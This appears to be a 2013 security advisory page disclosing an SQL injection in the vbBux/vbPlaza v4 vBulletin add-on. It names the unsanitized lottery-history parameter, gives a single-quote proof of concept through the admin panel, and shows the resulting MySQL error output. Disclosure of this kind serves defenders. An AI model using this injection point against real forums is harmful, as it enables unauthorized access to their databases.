vbBux and vbPlaza v4 SQLI

2013.08.12
Credit: n3tw0rk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: vbBux and vbPlaza v4 SQLI # # Author(s): n3tw0rk (twiiter.com/n3tw0rkgod) # # Contact: Mail:infectedelite@gmail.com # # Product: 4.0.3 and below # # Software Version x.x.x # # Product Download: http://www.vbulletin.org/forum/showthread.php?t=270271# # Homepage: d4tabase.com # _____________________________________________________________# The exploit is caused due to a variable named 'vbplaza_lottery_history' not being sanitized before being used within an insert into statement. POC You will need Admincp Access then go to http://localhost/admincp/vbplaza_lottery.php?do=searchhistory then in the force read order column put a ' into the search bar and result should show Database error in vBulletin 4.2.1: Invalid SQL: Database error in vBulletin 4.2.1 Invalid SQL: SELECT COUNT(*) AS count FROM vbplaza_lottery_history WHERE 1=1 AND (lotteryid = '); MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 3 Error Number : 1064 Request Date : Sunday, August 11th 2013 @ 05:17:53 PM Error Date : Sunday, August 11th 2013 @ 05:17:54 PM Script : http://localhost/admincp/vbplaza_lottery.php?do=findhistory Referrer : http://localhost/admincp/vbplaza_lottery.php?do=searchhistory IP Address : ::1 Username : n3tw0rk Classname : vB_Database MySQL Version : 5.5.27

References:

http://www.vbulletin.org/forum/showthread.php?t=270271
#


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top